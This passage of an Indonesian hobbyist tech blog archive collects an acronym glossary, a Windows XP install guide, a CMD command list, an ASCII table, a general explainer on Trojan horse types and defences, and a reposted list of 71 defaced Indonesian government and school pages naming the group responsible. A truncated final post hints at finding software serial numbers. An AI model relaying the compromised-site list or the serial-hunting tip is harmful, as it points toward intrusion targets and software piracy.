  822. SODIMM - Small Outline Dual Inline Memory Module
  823. SPARC - Scalable Processor ArChitecture
  824. SOHO - Small Office Home Office
  825. SRAM - Static Random Access Memory
  826. SSE - Streaming SIMD Extensions
  827. SVGA - Super Video Graphics Array
  828. S/PDIF - Sony/Philips Digital Interface
  829.  
  830. --- T ---
  831. TB - Terabytes
  832. TBps - Terabytes per second
  833. Tbps - Terabits per second
  834. TDK - TDK Electronics
  835. TEC - Thermoelectric Cooler
  836. TPC - TipidPC
  837. TWAIN - Technology Without An Important Name
  838.  
  839. --- U ---
  840. UART - Universal Asynchronous Receiver/Transmitter
  841. USB - Universal Serial Bus
  842. UTP - Unshieled Twisted Pair
  843.  
  844. --- V ---
  845. VCD - Video CD
  846. VPN - Virtual Private Network
  847.  
  848. --- W ---
  849. WAN - Wide Area Network
  850. WTB - Want to Buy
  851. WYSIWYG - What You See Is What You Get
  852.  
  853. --- X ---
  854. XGA - Extended Graphics Array
  855. XFX - XFX Graphics, a Division of Pine
  856. XMS - Extended Memory Specification
  857. XT - Extended Technology
  858. original from : http://www.the-cybers-skills.blogspot.com
  859. Cara install ulang komputer windows xp sp 2
  860. Saturday, December 04, 2010 6:48 PM
  861.  
  862. Spesifikasi minimum hardware yang dibutuhkan:
  863.  
  864.  
  865.    *  Prosesor Pentium 1.5 Ghz/AMD yang setara
  866.    *  CDROM/DVDROM drive
  867.    *  RAM 128 MB
  868.      
  869.  
  870.  
  871.  
  872.   1.  Sebelumnya kamu membutuhkan CD master Windows XP  terlebih dahulu kemudian masukan di CDROM/DVDROM kamu. Lalu restart  komputer kamu, kemudian nampak tampilan seperti gambar  lalu  tekan tombol Delete pada keybord agar kamu dapat masuk  di BIOS(Basic Input Output System) komputer. Pada beberapa jenis  Mainboard harus menekan tombol F2 pada keyboard. Kamu  dapat melihatnya pada perintah Press DEL to run Setup.
  873.      
  874.  
  875.   2.  Lalu kamu akan berada dalam BIOS kemudian pilih Boot pada  menu dan pilih item Boot Device Priority seperti pada  gambar.
  876.      
  877.  
  878.   3.  Setelah itu Kamu merubah [CDROM] pada posisi 1st Boot Device  untuk boot melalui CDROM dengan menggunakan tombol +-  di keyboard.Lalu tekan F10 untuk menyimpan konfigurasi  kamu.
  879.      
  880.  
  881.   4.  Restart komputer tunggu hingga muncul tulisan seperti pada gambar  lalu tekan sembarang tombol dengan cepat.
  882.   5.  Setelah pada tampilan berikut tekan Enter untuk  lanjut pada proses instal atau R untuk melakukan  reparasi Windows di Recovery Consule atau F3  untuk mengakhiri proses instal.
  883.   6.  Lanjut pada Lisencing Agreement tekan F8  untuk lanjut dan ESC untuk batalkan proses.
  884.      
  885.  
  886.   7.  Pada gambar  posisi partisi belum terisi oleh sistem windows.Tekan C  untuk membuat partisi baru pada harddisk dan Enter  untuk menginstal.
  887.      
  888.  
  889.   8.  Lalu masukan berapa besar kapasitas partisi yang ingin kamu buat  dalam satuan megabytes(MB) dan tekan Enter untuk  membuat partisinya seperti terlihat pada gambar.
  890.      
  891.   9.  Kemudian tekan Enter untuk melakukan proses instal  atau Delete untuk menghapus partisi.
  892.      
  893.  
  894.  10.  Dan pilih NTFS file system (Quick) atau FAT  file system (Quick) lalu tekan Enter.
  895.      
  896.  
  897.  11.  Bila proses instalasi langkah 1 → 10 benar maka  akan tampil seperti gambar.
  898.      
  899.  
  900.  12.  Setelah itu kamu sampai pada layar berikut Click Next.
  901.      
  902.  
  903.  13.  Lalu isikan dengan Nama dan Organisasi  Kamu kemudian tekan Next.
  904.      
  905.  
  906.  14.  Disini Kamu akan mengisikan Produk Key atau Serial Number  dari type windows Kamu tekan Next lagi.
  907.      
  908.  
  909.  15.  Isikan nama komputer dan password untuk mengaksesnya lalu tekan Next.
  910.      
  911.  
  912.  16.  
  913.      Set Time Zone pada posisi (GMT+80:00)  klik Next.
  914.      
  915.      
  916.  
  917.  17.  Typical settings: Pada option ini settingan  jaringan akan dibuat default windows dan Custom settings:  Untuk mensetting jaringan kamu secara manual lalu klik Next.
  918.      
  919.  
  920.  18.  Bila Kamu terhubung kejaringan local dengan domain pilih option Yes,  lalu isi dengan nama DOMAIN yang sama dengan DOMAIN  jaringan Kamu dan sebaliknya jika tidak terhubung kejaringan atau  terhubung tapi tanpa DOMAIN pilih option No, sekali  lagi tekan Next.
  921.      
  922.  
  923.  19.  Selanjutnya Kamutinggal mengklik Ok,Next,Skip dan Finish  juga diminta mengisikan nama kamu. hingga Kamu berada pada tampilan  Dekstop Windows seperti ini. Sekarang Kamu tinggal menginstal driver  hardware CPU Kamu.
  924.      
  925.  
  926.  
  927.  
  928. Source : Here
  929. original from : http://www.the-cybers-skills.blogspot.com
  930. Daftar website indonesia yang di deface pada HUT RI ke 65
  931. Saturday, December 04, 2010 6:49 PM
  932. Menjelang peringatan kemerdekaan ke-65 Republik Indonesia, hacker atau peretas dari Indonesia justru bikin ulah di puluhan situs yang mayoritas milik lembaga resmi di Indonesia.  
  933.  
  934. Mereka meninggalkan pesan begini, "DIRGAHAYU INDONESIA TANAH AIR PUSAKA  
  935. JAYALAH BANGSAKU, JAYALAH NEGERIKU..MERDEKA!!"
  936.  
  937. Aksi itu dimotori peretas yang menyebut diri Aria Killnine a.k.a arianom, pendiri komunitas KiLL-9 CrEw dengan situsnya di Www.KiLL-9.Tk.
  938.  
  939. Daftar situs yang diretas terlihat di bawah nanti. Tetapi, mengapa pula justru menyerang situs milik anak bangsa sendiri?
  940.  
  941. Kompasianer Rakhjib Martapianur memberitahu, "Mereka tidak melakukan perusakan terhadap site-site tersebut. Mereka hanya menitipkan file, sekaligus mengingatkan para admin site tersebut bahwa site yang mereka kelola rentan terhadap serangan oleh hacker-hacker luar Indonesia."
  942.  
  943. Rakhjib Martapianur mengakui, informasi itu diketahuinya dari temannya yang bergelut di dunia hacking. Dan, inilah daftar situs yang dititipi pesan-pesan dari peretas itu:
  944.  
  945. 1.    http://semestaberjaya.com/indonesiaku.php  
  946. 2.    http://fs.uns.ac.id/indonesia.php  
  947. 3.    http://unj.ac.id/indonesia.php  
  948. 4.    http://www.unand.ac.id/foto/indonesia.htm  
  949. 5.    http://el82itb.org/indonesia.htm  
  950. 6.    http://unhalu.ac.id/staff/indonesia.htm  
  951. 7.    http://www.adhiguna.ac.id/indonesia.htm  
  952. 8.    http://www.stikes-insan-seagung.ac.id/indonesia.htm  
  953. 9.    http://www.himsya.ac.id/indonesia.htm  
  954. 10.    http://www.poltekpos.ac.id/indonesia.htm  
  955. 11.    http://informatika.uin-malang.ac.id/COPYRIGHT.php  
  956. 12.    http://www.mar-eng.its.ac.id/ina/akademik/admin/foto_berita/indonesia.htm  
  957. 13.    http://kaltimprov.go.id/indonesia.php  
  958. 14.    http://pengadilan.net/indonesia.php  
  959. 15.    http://bkp.deptan.go.id/indonesia.htm  
  960. 16.    http://kemenegpora.go.id/merdeka.html  
  961. 17.    http://sifa.kemenegpora.go.id/merdeka.html  
  962. 18.    http://www.lsf.go.id/merdeka.html  
  963. 19.    http://pekalongankota.go.id/merdeka.html  
  964. 20.    http://bpphp1.dephut.go.id/merdeka.html  
  965. 21.    http://bpphp2.dephut.go.id/merdeka.html  
  966. 22.    http://bpphp3.dephut.go.id/merdeka.html  
  967. 23.    http://bpphp4.dephut.go.id/merdeka.html  
  968. 24.    http://bpphp5.dephut.go.id/merdeka.html  
  969. 25.    http://bpphp6.dephut.go.id/merdeka.html  
  970. 26.    http://bpphp8.dephut.go.id/merdeka.html  
  971. 27.    http://bpphp9.dephut.go.id/merdeka.html  
  972. 28.    http://bpphp10.dephut.go.id/merdeka.html  
  973. 29.    http://manmajenang.sch.id/files/indonesia.php  
  974. 30.    http://spma-samarinda.sch.id/indonesia.htm  
  975. 31.    http://smkn1kalasan.sch.id/merdeka.html  
  976. 32.    http://smkn1madiun.sch.id/merdeka.html  
  977. 33.    http://robbirodliyya.sch.id/merdeka.html  
  978. 34.    http://smkypesampang.sch.id/merdeka.html  
  979. 35.    http://www.smpn3kpj.sch.id/merdeka.html  
  980. 36.    http://www.majesa.sch.id/merdeka.html  
  981. 37.    http://smkypkpwk.sch.id/merdeka.html  
  982. 38.    http://smpn5cirebon.sch.id/merdeka.html  
  983. 39.    http://smpn2balen.sch.id/merdeka.html  
  984. 40.    http://smpn1oku.sch.id/merdeka.html  
  985. 41.    http://smkn6palembang.sch.id/merdeka.html  
  986. 42.    http://smpn4gm.sch.id/merdeka.html  
  987. 43.    http://smpn5lht.sch.id/merdeka.html  
  988. 44.    http://manhokut.sch.id/merdeka.html  
  989. 45.    http://mtsdarussalampkp.sch.id/merdeka.html  
  990. 46.    http://smkn1barru.sch.id/merdeka.html  
  991. 47.    http://sman3bantul.sch.id/merdeka.html  
  992. 48.    http://sman1cepu.sch.id/merdeka.html  
  993. 49.    http://smpn1piyungan-btl.sch.id/merdeka.html  
  994. 50.    http://www.smansa-mjl.sch.id/merdeka.html  
  995. 51.    http://smp1pra-bws.sch.id/merdeka.html  
  996. 52.    http://smpn13bdg.sch.id/merdeka.html  
  997. 53.    http://smpn1panumbangan.sch.id/merdeka.html  
  998. 54.    http://smpmuh-ckn.sch.id/merdeka.html  
  999. 55.    http://smkkpbe-bdg.sch.id/merdeka.html  
  1000. 56.    http://sditalamysubang.sch.id/merdeka.html  
  1001. 57.    http://sdnbjs2bdg.sch.id/merdeka.html  
  1002. 58.    http://www.smaplusbanyuasin.sch.id/merdeka.html  
  1003. 59.    http://www.smkn1samarinda.com/merdeka.html  
  1004. 60.    http://akademik.sma-alirsyad-clp.sch.id/merdeka.html  
  1005. 61.    http://sma-alirsyad-clp.sch.id/merdeka.html  
  1006. 62.    http://www.majesa.sch.id/merdeka.html  
  1007. 63.    http://www.bellarminus-bks.sch.id/merdeka.html  
  1008. 64.    http://sman2-wng.sch.id/merdeka.html  
  1009. 65.    http://www.sma1pekalongan.sch.id/merdeka.html  
  1010. 66.    http://kimomibutik.com/admin/foto_berita/indonesia.htm  
  1011. 67.    http://www.smart-v-indonesia.com/indonesia.php  
  1012. 68.    http://kabar-kini.com/indonesia.htm  
  1013. 69.    http://semestaberjaya.com/indonesia.php  
  1014. 70.    http://tikjo.my-php.net/indonesia.php  
  1015. 71.    http://www.pusatk3hiperkes.com/indonesia.htm
  1016.  
  1017. suaranews.com
  1018. original from : http://www.the-cybers-skills.blogspot.com
  1019. Perintah-perintah pada command prompt
  1020. Saturday, December 04, 2010 6:49 PM
  1021. ASSOC  Menampilkan atau mengubah asosiasi ekstensi file.
  1022. AT  Menjadwalkan perintah dan program agar berjalan di komputer.
  1023. ATTRIB  Menampilkan atau mengubah atribut file.
  1024. BREAK  Mengeset atau menghilangkan pengecekan extended CTRL+C.
  1025. CACLS  Menampilkan atau mengubah access control lists (ACLs) dai files.
  1026. CALL      Memanggil sebuah program batch dari program batch yang lain.
  1027. CD         Menampilkan nama atau mengubah direktori sekarang.
  1028. CHCP      Menampilkan atau mengubah active code page number.
  1029. CHDIR     Menampilkan nama atau mengubah direktori sekarang.
  1030. CHKDSK    Memeriksa sebuah disket/harddisk dan menampilkan laporan status..
  1031. CHKNTFS   Menampilkan atau mengubah pemeriksaan disket pada saat booting.
  1032. CLS        Menghapus layar..
  1033. CMD       Menjalankan interpreter command Windows yang baru.
  1034. COLOR     Mengubah warna foreground dan background pada command prompt.
  1035. COMP      Membandingkan isi dari dua atau beberapa file.
  1036. COMPACT   Menampilkan atau mengubah kompresi file pada partisi NTFS.
  1037. CONVERT   Mengkonversi FAT ke NTFS. Anda tidak dapat mengkonversi drive yang sedang aktif.
  1038. COPY     Menyalin satu atau beberapa file ke lokasi lain.
  1039. DATE      Menampilkan atau mengubah tanggal.
  1040. DEL       Menghapus satu atau beberapa file.
  1041. DIR        Menampilkan daftar file dan subdirektori dalam sebuah direktori.
  1042. DISKCOMP  Membandingkan isi dari dua buah disket.
  1043. DISKCOPY  Menyalin isi dari satu disket ke disket lain.
  1044. DOSKEY    Mngedit baris perintah, memanggil kembali perintah Windows, dan membuat macro.
  1045. ECHO      Menampilkan pesan, atau mengubah command echoing on atau off.
  1046. ENDLOCAL  Mengakhiri localization dari environment changes in a batch file.
  1047. ERASE     Menghapus satu atau beberapa fie.
  1048. EXIT      Keluar dari  program CMD.EXE.
  1049. FC         Membandingkan 2 atau beberapa file, dan Menampilkan perbedaan file-file tersebut.
  1050. FIND      Mencari string teks dalam sebuah file atau beberapa file.
  1051. FINDSTR   Mencari string dalam file.
  1052. FOR       Menjalankan perintah yang spesifik untuk masing-masing file dalam sekumpulan file.
  1053. FORMAT    Mem-Formats sebuah hardisk/disket untuk digunakan dalam Windows.
  1054. FTYPE     Menampilkan atau mengubah tipe file yang digunakan dalam asosiasi ekstensi file.
  1055. GOTO      Mengarahkan Windows command interpreter ke baris yang berlabel dalam sebuah program batch.
  1056. GRAFTABL  Membolehkan Windows untuk menampilkan sekumpulan karakter extended dalam mode grafik.
  1057. HELP      Menyediakan informasi Help untuk perintah-perintah Windows.
  1058. IF         Menjalankan proses kondisi dalam program batch.
  1059. LABEL     Membuat, mengubah, atau menghapus volume label dari sebuah disket/harddisk.
  1060. MD        Membuat direktori.
  1061. MKDIR     Membuat direktori.
  1062. MODE      Mengkonfigurasi system device.
  1063. MORE      Menampilkan hasil perlayar..
  1064. MOVE      Memindahkan satu atau beberapa file dari satu direktori ke direktori yang lain.
  1065. PATH      Menampilkan ata mengeset search path untuk executable files.
  1066. PAUSE     Menunda pemrosesan dari sebuah batch file dan Menampilkan pesan.
  1067. POPD     Mengembalikan nilai sebelumnya dari direktori sekarang yang disimpan oleh PUSH.
  1068. PRINT    Mencetak file teks.
  1069. PROMPT    Mengubah command prompt Windows.
  1070. PUSHD     Menyimpan direktori sekarang kemudian mengubahnya.
  1071. RD         Menghapus direktori.
  1072. RECOVER   Mengembalikan informasi yang masih dapat dibaca dari sebuah disket/harddisk yang sudah bad/rusak.
  1073. REM       Merekam kemontar dalam batch files atau CONFIG.SYS.
  1074. REN       Mengubah nama file.
  1075. RENAME    Mengubah nama file.
  1076. REPLACE   Menggantikan file.
  1077. RMDIR     Menghapus direktori.
  1078. SET        Menampilkan, mengatur, atau menghapus Windows environment variables.
  1079. SETLOCAL  Memulai localization dari environment changes dalam sebuah batch file.
  1080. SHIFT     Menggeser posisi parameters yang replacable dalam batch files.
  1081. SORT      Mensortir input.
  1082. START     Memulai jendela terpisah untuk menjalankan perintah atau program spesifik.
  1083. SUBST     Meng-asosiasikan sebuah path dengan drive letter.
  1084. TIME      Menampilkan atau mengatur waktu sistem.
  1085. TITLE     Mengatur judul jendela untuk sesi CMD.EXE.
  1086. TREE      Menampilkan secara grafis struktur direktori dari sebuah drivve atau path.
  1087. TYPE      Menampilkan isi dari sebuah file eks.
  1088. VER       Menampilkan versi windows.
  1089. VERIFY    memberitahu Windows untuk mem-verifikasi file anda telah disimpan secara benar dalam harddisk/disket.
  1090. VOL       Menampilkan nomor serial dan volume label dari sebuah harddisk/disket
  1091. XCOPY     Menyalin file dan pohon direktori.
  1092. original from : http://www.the-cybers-skills.blogspot.com
  1093. Trojan Horse
  1094. Saturday, April 23, 2011 10:05 PM
  1095.  
  1096. Untuk mengetahui apa itu Trojan Horse mari kita pelajari terlebih dahulu sejarah dari nama Trojan Horse itu sendiri. Nah sejarahnya Nama Trojan Horse berasal dari sejarah Yunani Kuno dimana terjadi peperangan antara bangsa Yunani dengan Troy selama lebih dari 10 tahun. Penyusup dari Yunani dipanggil Sinon menawarkan hadiah Trojan yang berbentuk Kuda dari kayu berukuran besar dan berhasil mengyakinkan Troy bahwa Kuda Kayu (Trojan) tersebut dapat memberi kekuatan abadi kepada bangsa Troy. Setelah Kuda Kayu tersebut masuk ke kota Troy , tidak disangka telah banyak pasukan Yunani yang bersembunyi di dalamnya, Yunani berhasil melumpuhkan dan membakar habis kota Troy dari dalam. Kisah tersebut mengilhami para hacker untuk menciptakan “penyusup” ke komputer orang lain yang disebut dengan Trojan Horse. Daniel Edwards dari National Security Agency (NSA) yang diakui mencetuskan istilah Trojan Horse untuk program jahat yang menyelinap dalam komputer korban (detik.com,12/06/2008)
  1097.  
  1098. Sejarah Trojan Horse
  1099. Trojan Horse dalam dunia IT
  1100. Trojan Horse (Kuda Troya), Trojan Horse bukanlah sebuah virus, karena Trojan Horse tidak memiliki kemampuan untuk menggandakan diri. Namun demikian, Trojan Horse tidak kalah berbahaya jika dibandingkan dengan virus. Trojan Horse umumnya dikemas dalam bentuk sebuah software yang menarik. Namun dibalik daya tarik software tersebut, tersembunyi fungsi lain untuk melakukan perusakan. Misalkan saja software Keygen /key generator atau software pencari Serial Number(SN)/ kunci, nah tentunya kita tertarik bukan untuk menjalankan software tersebut? Karena kadang-kadang software meminta kita melakukan registrasi dengan memasukkan SN utuk menghilangkan masa trialnya. Pengguna komputer yang mendapatkan file yang telah mengandung Trojan Horse ini umumnya akan terpancing untuk menjalankannya yah Karena daya tarik tadi. Akibatnya tentu fatal, karena dengan demikian si pengguna telah meenjalankan rutin-rutin perusak yang siap menebar bencana di komputernya. Trojan bisa berupa program perusak maupun program kendali. Contoh trojan misalnya kaHt, Back Orifice dan Netbus. Apabila korban telah terkena salah satu dari program ini maka apabila korban terhubung ke jaringan atau internet, si pengirim trojan dapat mengendalikan komputer korban dari jauh,karena trojan membuka port-port tertentu agar komputer dapat diremote, bahkan tidak mustahil untuk mematikan atau merusak dari jauh. Itu sama halnya dengan penduduk kota Troy yang terlambat menyadari bahwa kota mereka sudah di masuki oleh tentara musuh.
  1101. Cara kerja Trojan Horse
  1102. Trojan masuk melalui dua bagian, yaitu bagian client dan server. Jadi hacker kadang harus berjalan menanamkan trojannya di komputer korban ataupun memancing agar sang korban mengeksekusi/membuka file yang mengandung Trojan, namun ada juga Trojan yang langsung menginfeksi korbannya hanya dengan berbekal ip korban misalnya Kaht. Ketika korban (tanpa diketahui) menjalankan file yang mengandung Trojan pada komputernya, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi. Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai membuka beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting agar trojan menjadi otomatis aktif saat komputer dihidupkan. Trojan sangat berbahaya bagi pengguna komputer yang tersambung jaringan komputer atau internet, karena bisa jadi hacker bisa mencuri data-data sensitif misalnya password email, dial-up passwords, webservices passwords, e-mail address, dokumen pekerjaan, internet banking, paypal, e-gold,kartu kredit dan lain-lain.
  1103. Jenis-jenis Trojan? Jenis-jenis Trojan antara lain:
  1104. 1. Trojan Remote Access
  1105. Trojan Remote Access termasuk Trojan paling populer saat ini. Banyak penyerang menggunakan Trojan ini dengan alasan fungsi yang banyak dan sangat mudah dalam penggunaannya. Prosesnya adalah menunggu seseorang menjalankan Trojan yang berfungsi sebagai server dan jika penyerang telah memiliki IP address korban, maka penyerang dapat mengendalikan secara penuh komputer korban. Contoh jenis Trojan ini adalah Back Orifice (BO), yang terdiri dari BOSERVE.EXE yang dijalankan dikomputer korban dan BOGUI.EXE yang dijalankan oleh penyerang untuk mengakses komputer korban.
  1106. 2. Trojan Pengirim Password
  1107. Tujuan dari Trojan jenis ini adalah mengirimkan password yang berada di komputer korban atau di Internet ke suatu e-mail khusus yang telah disiapkan. Contoh password yang disadap misalnya untuk ICQ, IRC, FTP, HTTP atau aplikasi lain yang memerlukan seorang pemakai untuk masuk suatu login dan password. Kebanyakan Trojan ini menggunakan port 25 untuk mengirimkan e-mail. Jenis ini sangat berbahaya jika dalam komputer terdapat password yang sangat penting.
  1108. 3. Trojan File Transfer Protocol (FTP)
  1109. Trojan FTP adalah paling sederhana dan dianggap ketinggalan jaman. Satu-satunya fungsi yang dijalankan adalah membuka port 21 di komputer korban yang menyebabkan mempermudah seseorang memiliki FTP client untuk memasuki komputer korban tanpa password serta melakukan download atau upload file.
  1110. 4. Keyloggers
  1111. Keyloggers termasuk dalam jenis Trojan yang sederhana, dengan fungsi merekam atau mencatat ketukan tombol saat korban melakukan pengetikan dan menyimpannya dalam logfile. Apabila diantara ketukan tersebut adalah mengisi user name dan password, maka keduanya dapat diperoleh penyerang dengan membaca logfile. Trojan ini dapat dijalankan pada saat komputer online maupun offline. Trojan ini dapat mengetahui korban sedang online dan merekam segala sesuatunya. Pada saat offline proses perekaman dilakukan setelah Windows dijalankan dan disimpan dalam hardisk korban dan menunggu saat online untuk melakukan transfer atau diambil oleh penyerang.
  1112. 5. Trojan Penghancur
  1113. Satu-satunya fungsi dari jenis ini adalah untuk menghancurkan dan menghapus file. Trojan penghancur termasuk jenis yang sederhana dan mudah digunakan, namun sangat berbahaya. Sekali terinfeksi dan tidak dapat melakukan penyelamatan maka sebagian atau bahkan semua file sistem akan hilang. Trojan ini secara otomatis menghapus semua file sistem pada komputer korban (sebagai contoh : *.dll, *.ini atau *.exe). Trojan diaktifkan oleh penyerang atau bekerja seperti sebuah logic bomb dan mulai bekerja dengan waktu yang ditentukan oleh penyerang.
  1114. 6. Trojan Denial of Service (DoS) Attack
  1115. Trojan DoS Attack saat ini termasuk yang sangat populer. Trojan ini mempunyai kemampuan untuk menjalankan Distributed DoS (DDoS) jika mempunyai korban yang cukup. Gagasan utamanya adalah bahwa jika penyerang mempunyai 200 korban pemakai ADSL yang telah terinfeksi, kemudian mulai menyerang korban secara serempak. Hasilnya adalah lalu lintas data yang sangat padat karena permintaan yang bertubi-tubi dan melebihi kapasitas band width korban. Hal tersebut menyebabkan akses Internet menjadi tertutup. Wintrinoo adalah suatu tool DDoS yang populer baru-baru ini, dan jika penyerang telah menginfeksi pemakai ADSL, maka beberapa situs utama Internet akan collaps. Variasi yang lain dari sebuah trojan DoS adalah trojan mail-bomb, tujuan utamanya adalah untuk menginfeksi sebanyak mungkin komputer dan melakukan penyerangan secara serempak ke alamat e-mail yang spesifik maupun alamat lain yang spesifik dengan target yang acak dan muatan/isi yang tidak dapat disaring.
  1116. 7. Trojan Proxy/Wingate
  1117. Bentuk dan corak yang menarik diterapkan oleh pembuat trojan untuk mengelabui korban dengan memanfaatkan suatu Proxy/Wingate server yang disediakan untuk seluruh dunia atau hanya untuk penyerang saja. Trojan Proxy/Wingate digunakan pada Telnet yang tanpa nama, ICQ, IRC, dan untuk mendaftarkan domain dengan nomor kartu kredit yang telah dicuri serta untuk aktivitas lain yang tidak sah. Trojan ini melengkapi penyerang dengan keadaan tanpa nama dan memberikan kesempatan untuk berbuat segalanya terhadap komputer korban dan jejak yang tidak dapat ditelusuri.
  1118. 8. Software Detection Killers
  1119. Beberapa Trojan telah dilengkapi dengan kemampuan melumpuhkan fungsi software pendeteksi, tetapi ada juga program yang berdiri sendiri dengan fungsi yang sama. Contoh software pendeteksi yang dapat dilumpuhkan fungsinya adalah Zone Alarm, Norton Anti-Virus dan program anti-virus/firewall yang lain berfungsi melindungi komputer. Ketika software pendeteksi dilumpuhkan, penyerang akan mempunyai akses penuh ke komputer korban, melaksanakan beberapa aktivitas yang tidak sah, menggunakan komputer korban untuk menyerang komputer yang lain.
  1120. cara mengatasi bahaya Trojan
  1121. Pertama lakukan langkah pendeteksian keberadaan Trojan pada komputer. Pendeteksian Trojan dapat dilakukan dengan cara-cara sebagai berikut
  1122. 1. Task List
  1123. Pendeteksiannya dengan melihat daftar program yang sedang berjalan dalam task list. Daftar dapat ditampilkan dengan menekan tombol CTRL+ALT+DEL atau klik kanan pada toolbar lalu klik task manager. Selain dapat mengetahui program yang berjalan, pemakai dapat melakukan penghentian terhadap suatu program yang dianggap aneh dan mencurigakan. Namun beberapa Trojan tetap mampu menyembunyikan dari task list ini. Sehingga untuk mengetahui secara program yang berjalan secara keseluruhan perlu dibuka System Information Utility(msinfo32.exe) yang berada di C:\Program files\common files\microsoft shared\msinfo. Tool ini dapat melihat semua proses itu sedang berjalan, baik yang tersembunyi dari task list maupun tidak. Hal-hal yang perlu diperiksa adalah path, nama file, properti file dan berjalannya file *.exe serta file *.dll.
  1124. 2. Netstat
  1125. Semua Trojan membutuhkan komunikasi. Jika mereka tidak melakukan komunikasi berarti tujuannya sia-sia. Hal ini adalah kelemahan yang utama dari Trojan, dengan komunikasi berarti mereka meninggalkan jejak yang kemudian dapat ditelusuri. Perintah Netstat berfungsi membuka koneksi ke dan dari komputer seseorang. Jika perintah ini dijalankan maka akan menampilkan IP address dari komputer tersebut dan komputer yang terkoneksi dengannya. Jika ditemukan IP address yang tidak dikenal maka perlu diselidiki lebih lanjut, mengejar dan menangkapnya.
  1126. 3. TCP View
  1127. TCPVIEW adalah suatu free utility dari Sysinternals yang mempunyai kemampuan menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk koneksi dengan komputer pemakai. Dengan menggunakan informasi tersebut, maka jika terjadi penyerangan dapat diketahui dan dapat melakukan serangan balik. Langkah penghapusan Trojan Trojan dapat dihapus dengan: Menggunakan Software Anti-Virus. Sebagian antivirus dapat digunakan untuk mengenali dan menghapus Trojan. Menggunakan Software Trojan Scanner, software yang di khususkan untuk mendeteksi dan menghapus Trojan Cara yang paling sadis yah diinstal ulang komputernya.
  1128. Langkah pencegahan Trojan Untuk mencegah
  1129. Trojan menyusup di komputer anda, pastikan anda memasang antivirus yang selalu ter-update, mengaktifkan Firewall baik bawaan dari Windows atau dari luar. Selalu waspadalah jika komputer anda mengalami sesuatu kejanggalan. Hindari penggunaan sofware ilegal karena sering tanpa kita sadari software tersebut mengandung Trojan, downloadlah software dari situs-situs yang benar-benar dapat dipercaya.
  1130. Referensi:
  1131. Apa itu trojan horse-ZonaKita.net
  1132. Deteksi Trojan dan Penangannannya,Rohmadi Hidayat
  1133. Konsep perlindungan komputer terhadap virus, Minnarto Djojo
  1134. Sumber : Copyright © 2009 IlmuKomputer.Org
  1135. original from : http://www.the-cybers-skills.blogspot.com
  1136. Standard ASCII Character Set
  1137. Saturday, April 23, 2011 10:08 PM
  1138. Standard ASCII Character Set= For Bytes
  1139. The first 32 values (0 through 31) are codes for things like carriage return and line feed. The space character is the 33rd value, followed by punctuation, digits, uppercase characters and lowercase characters.
  1140.  
  1141. 0   NUL
  1142. 1   SOH
  1143. 2   STX
  1144. 3   ETX
  1145. 4   EOT
  1146. 5   ENQ
  1147. 6   ACK
  1148. 7   BEL
  1149. 8   BS
  1150. 9   TAB
  1151. 10   LF
  1152. 11   VT
  1153. 12   FF
  1154. 13   CR
  1155. 14   SO
  1156. 15   SI
  1157. 16   DLE
  1158. 17   DC1
  1159. 18   DC2
  1160. 19   DC3
  1161. 20   DC4
  1162. 21   NAK
  1163. 22   SYN
  1164. 23   ETB
  1165. 24   CAN
  1166. 25   EM
  1167. 26   SUB
  1168. 27   ESC
  1169. 28   FS
  1170. 29   GS
  1171. 30   RS
  1172. 31   US
  1173. 32
  1174. 33   !
  1175. 34   "
  1176. 35   #
  1177. 36   $
  1178. 37   %
  1179. 38   &
  1180. 39   '
  1181. 40   (
  1182. 41   )
  1183. 42   *
  1184. 43   +
  1185. 44   ,
  1186. 45   -
  1187. 46   .
  1188. 47   /
  1189. 48   0
  1190. 49   1
  1191. 50   2
  1192. 51   3
  1193. 52   4
  1194. 53   5
  1195. 54   6
  1196. 55   7
  1197. 56   8
  1198. 57   9
  1199. 58   :
  1200. 59   ;
  1201. 60   < 61   = 62   >
  1202. 63   ?
  1203. 64   @
  1204. 65   A
  1205. 66   B
  1206. 67   C
  1207. 68   D
  1208. 69   E
  1209. 70   F
  1210. 71   G
  1211. 72   H
  1212. 73   I
  1213. 74   J
  1214. 75   K
  1215. 76   L
  1216. 77   M
  1217. 78   N
  1218. 79   O
  1219. 80   P
  1220. 81   Q
  1221. 82   R
  1222. 83   S
  1223. 84   T
  1224. 85   U
  1225. 86   V
  1226. 87   W
  1227. 88   X
  1228. 89   Y
  1229. 90   Z
  1230. 91   [
  1231. 92   \
  1232. 93   ]
  1233. 94   ^
  1234. 95   _
  1235. 96   `
  1236. 97   a
  1237. 98   b
  1238. 99   c
  1239. 100   d
  1240. 101   e
  1241. 102   f
  1242. 103   g
  1243. 104   h
  1244. 105   i
  1245. 106   j
  1246. 107   k
  1247. 108   l
  1248. 109   m
  1249. 110   n
  1250. 111   o
  1251. 112   p
  1252. 113   q
  1253. 114   r
  1254. 115   s
  1255. 116   t
  1256. 117   u
  1257. 118   v
  1258. 119   w
  1259. 120   x
  1260. 121   y
  1261. 122   z
  1262. 123   {
  1263. 124   |
  1264. 125   }
  1265. 126   ~
  1266. 127   DEL
  1267.  
  1268. Name
  1269.  
  1270. Abbr.
  1271.  
  1272. Size
  1273. Kilo
  1274.  
  1275. K
  1276.  
  1277. 2^10 = 1,024
  1278. Mega
  1279.  
  1280. M
  1281.  
  1282. 2^20 = 1,048,576
  1283. Giga
  1284.  
  1285. G
  1286.  
  1287. 2^30 = 1,073,741,824
  1288. Tera
  1289.  
  1290. T
  1291.  
  1292. 2^40 = 1,099,511,627,776
  1293. Peta
  1294.  
  1295. P
  1296.  
  1297. 2^50 = 1,125,899,906,842,624
  1298. Exa
  1299.  
  1300. E
  1301.  
  1302. 2^60 = 1,152,921,504,606,846,976
  1303. Zetta
  1304.  
  1305. Z
  1306.  
  1307. 2^70 = 1,180,591,620,717,411,303,424
  1308. Yotta
  1309.  
  1310. Y
  1311.  
  1312. 2^80 = 1,208,925,819,614,629,174,706,176
  1313. original from : http://www.the-cybers-skills.blogspot.com
  1314. Get the serial number you need ! (For Certain Things)
  1315. Wednesday, July 21, 2010 9:10 PM
  1316. * Go to Google.
  1317.  
